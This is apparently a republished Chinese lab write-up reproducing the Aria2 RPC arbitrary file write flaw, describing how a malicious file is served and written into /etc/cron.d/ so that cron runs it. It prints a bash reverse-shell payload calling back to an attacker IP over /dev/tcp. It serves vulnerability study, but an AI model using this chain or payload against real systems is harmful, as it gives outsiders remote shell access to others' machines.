Aria2任意文件寫入漏洞

by ADummy

0x00利用路線

? 第三方UI與目標進行通信—>搭建http服務(wù)器—>讓目標下載惡意文件—>定時任務(wù)執(zhí)行—>反彈shell

0x01漏洞介紹

? Aria2是一個輕量級，多協(xié)議，多源下載工具（支持HTTP / HTTPS，FTP，BitTorrent，Metalink），內(nèi)置XML-RPC和JSON-RPC接口。在有權(quán)限的情況下，我們可以使用RPC接口來操作aria2來下載文件，將文件下載至任意目錄，造成一個任意文件寫入漏洞。通過控制文件下載鏈接，文件儲存路徑以及文件名，可以實現(xiàn)任意文件寫入。同時通過Aria2提供的其他功能，諸如save-session等也能輕易地實現(xiàn)任意文件寫入指定功能

0x02漏洞復(fù)現(xiàn)

**PAYLOAD:

#! /bin/bash /bin/bash -i >& /dev/tcp/192.168.15.128/8888 0>&1

? 6800是aria2的rpc服務(wù)的默認端口，環(huán)境啟動后，訪問http://your-ip:6800/，看到一個空白頁面，通過bp抓包可以看到返回了404，說明服務(wù)已啟動

? 由于rpc通信需要json或xml，因此不方便，因此我們可以使用第三方UI與目標進行通信，例如http://binux.github.io/yaaw/demo/

? 打開yaaw，單擊配置按鈕，然后填寫運行aria2：的目標域名http://your-ip:6800/jsonrpc

? python創(chuàng)建一個簡單的服務(wù)器。

Python2 ：python2 -m SimpleHTTPServer 8000
Python3 ：python3 -m http.server 8000

? 搭建成功后訪問一下，可以看到寫好的shell文件

? 然后單擊“添加+”以添加新的下載任務(wù)。在“目錄”（Dir）字段中填寫要下載文件的目錄，并在“文件名”（File Name）字段中填寫所需的文件名。例如，我們將通過編寫crond任務(wù)來下載反向shell程序

? 此時，arai2會將惡意文件（您指定的URL）下載到/etc/cron.d/目錄中，文件名為“ shell”。在debian中，/ etc / cron.d目錄中的所有文件都將作為計劃任務(wù)配置文件（如crontab）讀取。編寫完成后，我們必須等待一分鐘才能執(zhí)行反向Shell腳本

此處環(huán)境有問題，等了很久都沒反彈到shell，看人家說是1分鐘左右，于是找了下原因，在這篇博客中https://www.cnblogs.com/foe0/p/11353506.html博主就說了大概率是靶場環(huán)境不完整導(dǎo)致的。既然他定時任務(wù)動不了，那我自己動手不過分吧

如果反向Shell不成功，請注意crontab文件的格式，并且換行符必須為`\n`，并且文件末尾需要換行符

0x03參考資料

https://www.dtmao.cc/news_show_469672.shtml

其他利用方法:https://paper.seebug.org/120/

總結(jié)

以上是生活随笔為你收集整理的Aria2任意文件写入漏洞 漏洞复现的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。